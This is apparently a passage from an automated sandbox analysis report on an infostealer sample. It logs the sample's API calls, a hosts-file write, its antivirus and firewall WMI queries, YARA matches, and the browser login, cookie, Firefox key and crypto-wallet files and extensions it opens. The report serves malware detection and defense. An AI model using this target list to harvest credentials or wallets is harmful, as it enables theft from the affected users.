Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 10_2_00438423
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: EnumSystemLocalesW, 10_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: GetLocaleInfoW, 10_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW, 10_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: EnumSystemLocalesW, 10_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 10_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 10_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 10_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 14_2_04AB0AB6
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 15_2_049F0AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_00405D09 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_00405D09
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 10_2_0042FE47
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\filename.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: RegAsm.exe, 00000014.00000002.2408605427.0000000005814000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2416382607.00000000073FA000.00000004.00000020.00020000.00000000.sdmp, D3CC.exe, 00000015.00000002.2263138314.0000000001838000.00000004.00000020.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2259445423.0000000001861000.00000004.00000020.00020000.00000000.sdmp, D3CC.exe, 00000015.00000002.2263683731.0000000001861000.00000004.00000020.00020000.00000000.sdmp, D3CC.exe, 00000015.00000002.2263138314.00000000017C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: D3CC.exe PID: 6596, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.C12E.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2113910213.000000000048B000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2352119680.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C12E.exe PID: 6280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7164, type: MEMORYSTR
Source: Yara match File source: 00000005.00000002.1986547068.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1986391859.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1719529460.0000000002FD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718695022.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
Source: RegAsm.exe, 00000014.00000002.2364194118.00000000030F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: D3CC.exe, 00000015.00000003.2187461891.00000000017E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000014.00000002.2364194118.00000000030F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.walletLR^qhb$
Source: RegAsm.exe, 00000014.00000002.2364194118.00000000030F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\walletsLR^q0W$
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: RegAsm.exe, 00000014.00000002.2364194118.00000000030F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $^q%appdata%`,^qdC:\Users\user\AppData\Roaming`,^qdC:\Users\user\AppData\Roaming\Binance
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: RegAsm.exe, 00000014.00000002.2364194118.00000000030F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $^q&%localappdata%\Coinomi\Coinomi\walletsLR^q
Source: RegAsm.exe, 00000014.00000002.2364194118.00000000030F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: D3CC.exe, 00000015.00000003.2259445423.000000000184A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: D3CC.exe, 00000015.00000003.2187461891.00000000017E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
